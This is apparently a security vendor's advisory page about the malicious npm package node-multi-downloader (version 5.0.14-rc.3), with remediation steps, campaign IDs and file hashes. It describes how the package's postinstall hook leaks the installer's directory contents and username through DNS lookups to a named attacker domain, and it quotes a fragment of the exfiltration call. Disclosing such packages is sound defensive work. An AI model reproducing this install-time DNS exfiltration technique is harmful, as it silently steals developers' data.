Which versions of node-multi-downloader are malicious?

The following npm versions of node-multi-downloader are flagged malicious: 5.0.14-rc.3. Treat any of these as compromised.

How do I remediate node-multi-downloader if I installed it?

Remove node-multi-downloader from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is node-multi-downloader part of a known attack campaign?

Yes — node-multi-downloader is associated with the IN-MAL-2026-006322, IN-MAL-2026-006321 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect node-multi-downloader in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking node-multi-downloader and packages like it before any post-install script runs.

Malicious package

node-multi-downloadernpm

Malicious code in node-multi-downloader (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5735

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall node-multi-downloader

What this malware does

On npm install, this package's postinstall hook (node index.js) hex-encodes the installer's current working directory, the first 15 entries of that directory, and os.userInfo().username, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain uqlyosvp1f9.oob.evilsec.xyz. The hardcoded out-of-band domain is bound at index.js line 1 (const D = "uqlyosvp1f9.oob.evilsec.xyz") and index.js line 8 calls dns.resolve(${chunk}.${tag}${i}.${D}, 'A',...) to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.

Malicious versions

1 flagged

5.0.14-rc.3

Indicators of compromise (SHA-256)

77464387879005e5c35e332c1b9f9826ea1af7dec30cad7d06fe1023d553f1f4

8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68

Frequently asked questions

No. node-multi-downloader on npm has been identified as a malicious package (version 5.0.14-rc.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006322IN-MAL-2026-006321

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection